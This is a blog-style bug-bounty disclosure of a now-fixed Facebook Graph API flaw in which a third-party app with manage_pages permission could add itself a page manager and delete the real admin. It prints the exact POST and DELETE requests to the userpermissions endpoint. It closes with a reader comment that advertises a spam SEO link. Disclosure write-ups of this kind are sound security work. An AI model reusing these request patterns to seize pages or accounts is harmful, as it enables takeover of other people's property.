A security vulnerability in Facebook business manager endpoint allows a third party application to hack any Facebook page with limited permissions and the victim will permanently lose admin access to the page.
By default, Facebook application interface do not allow third party applications to add or modify page admin roles (page roles like manager, editor, analyst etc..). Third party applications are allowed to perform all the operations like post statuses on your behalf, publish photos, etc.. except adding admin roles because if an application is allowed to add or remove admins then it could add some user as admin to the page and remove the actual owner permanently.
facebook page hack
In the other hand, there is an endpoint for business pages called userpermissions which allows to add or remove business page admin roles who are already handling the Facebook business.The following request would make target user as admin of the page.

Request :-
POST /<page_id>/userpermissions HTTP/1.1
Host :  graph.facebook.com 
Content-Length: 245
role=MANAGER&user=<target_user_id>&business=<associated_business_id>&access_token=<application_access_token>
 
Response :-
true
After a few minutes of testing I got to know that removing the business parameter from the request didn’t throw any error and allow us to add anyone as new page admin and delete the actual page admin on non-business page where the application has manage_pages permission.
That’s it! Whatever the application may be, if it is having manage_pages permission of the admin then it could hack all of your Facebook pages in a fraction of seconds.

Read how hackers could hack a Facebook account and their prevention measures

Final Proof of Concept :- 

If you are unable to understand then please watch this video.

Page Takeover :

Request :-
POST /<page_id>/userpermissions HTTP/1.1
Host :  graph.facebook.com 
Content-Length: 245
role=MANAGER&user=<target_user_id>&access_token=<application_access_token>
 
Response :-
true
 

Removing Victim

Request :-
Delete /<page_id>/userpermissions HTTP/1.1
Host :  graph.facebook.com 
Content-Length: 245
user=<target_user_id>&access_token=<application_access_token>
 
Response :-
true
Thats all! Target page is hacked!
 
Reported this vulnerability to Facebook security team and it is completely fixed now. They rewarded me $2500 USD as a part of their bug bounty program.
Even though they placed a fix for this vulnerability, please be aware of the permissions you grant to any applications.
 

Read SEMrush Review – A magical tool to beat your competitors in search!

Permissions dialog box would look like this
Manage pages permission dialog box
if manage_pages is requested please note that this app would be able to manage your pages (post statuses, publish photos etc..).
Don’t worry you can still modify the permissions you have granted to other apps here.
 
Facebook reply after few emails 
 
Acknowledgement of Fix

Hacking Facebook account | Facebook Hacker

This is one of the most searched and hot topics around the Internet. I have prepared a detailed list of how hackers could hack our Facebook account and how could we prevent the same. Read more about it here

SHARE

17 COMMENTS

  1. The video could be more usefull if you slow down. And perhaps add some text about what you're doing.

    Keep up the good work! Enjoy, the bounty 😉

  2. This is a memo to the admin. I discovered your Hacking Facebook Pages – Zero Hacks page by searching on Google but it was hard to find as you were not on the front page of search results. I know you could have more traffic to your website. I have found a website which offers to dramatically increase your rankings and traffic to your site: http://dtl.la/tmJ9x I managed to get close to 500 visitors/day using their service, you can also get many more targeted visitors from search engines than you have now. Their services brought significantly more traffic to my website. I hope this helps!

LEAVE A REPLY